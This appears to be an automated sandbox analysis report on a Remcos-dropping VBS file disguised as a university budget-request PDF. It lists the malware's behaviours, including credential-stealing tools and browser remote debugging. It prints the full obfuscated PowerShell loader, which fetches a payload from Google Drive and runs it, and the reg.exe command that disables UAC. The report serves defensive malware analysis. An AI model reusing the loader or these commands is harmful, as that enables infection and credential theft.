Analysis Overview
SHA256
d7ea8908f53391d47f6ecf1e6bb8b30d03b0abb4c77f688d03920ceeeda66812
Threat Level: Known bad
The file 11112024_0717_PERMINTAAN ANGGARAN (Universitas IPB) ID177888_pdf.vbs.zip was found to be: Known bad.
Malicious Activity Summary
Remcos family
Remcos
UAC bypass
NirSoft MailPassView
NirSoft WebBrowserPassView
Detected Nirsoft tools
Uses browser remote debugging
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook accounts
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Enumerates system info in registry
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-11 07:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-11 07:17
Reported
2024-11-11 07:22
Platform
win7-20240708-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2368 wrote to memory of 872 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2368 wrote to memory of 872 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2368 wrote to memory of 872 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. 
Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur 
NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC 
oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"
Network
Files
C:\Users\Admin\AppData\Local\Temp\CabB260.tmp
| Hash | Value |
| --- | --- |
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-11 07:17
Reported
2024-11-11 07:22
Platform
win10v2004-20241007-en
Max time kernel
297s
Max time network
280s
Command Line
Signatures
Remcos
Remcos family
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2024 set thread context of 2524 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2024 set thread context of 1416 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2024 set thread context of 4664 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files\Google\Chrome\Application\Chrome.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa39fbcc40,0x7ffa39fbcc4c,0x7ffa39fbcc58
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\euyomxdaaormfgjg"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pwdgnpncowjzhvfkrmd"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pwdgnpncowjzhvfkrmd"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zqjzohyvkebesbtoaxpegvp"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2072,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1960,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2432 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa39e746f8,0x7ffa39e74708,0x7ffa39e74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
